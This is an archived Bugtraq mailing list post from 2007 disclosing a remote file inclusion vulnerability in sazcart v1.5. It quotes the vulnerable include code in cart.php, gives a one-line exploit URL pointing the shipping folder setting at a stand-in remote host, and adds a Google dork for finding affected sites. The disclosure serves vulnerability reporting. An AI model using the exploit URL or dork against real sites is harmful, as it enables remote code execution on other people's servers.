Bugtraq mailing list archives
sazcart v1.5 (cart.php) Remote File include
From: emel_gw_ini () yahoo com
Date: 9 Jan 2007 22:20:54 -0000
*********************---Hitamputih crew---******************************** * Bug Found By : IbnuSina * vendor : http://sazcart.com/site *Risk : High * Greetz : *Solpot,permenhack,barbarosa,cah|gemblunkz,fung_men,setiawan,irvian,meteoroid * and all member hitamputih crew community *************************************************************************** bug found on admin/controls/cart.php include($_saz['settings']['shippingfolder'] . "/shipping.php"); $Shipping = new Shipping; include($_saz['settings']['taxfolder'] . "/tax.php"); $Tax = new Tax; exploit : http://sitename.com/[sazcart PATH]/admin/controls/cart.php?_saz[settings][shippingfolder]=HTTP://EVILCODE? google dork: "powered by sazcart"
Current thread:
- sazcart v1.5 (cart.php) Remote File include emel_gw_ini (Jan 10)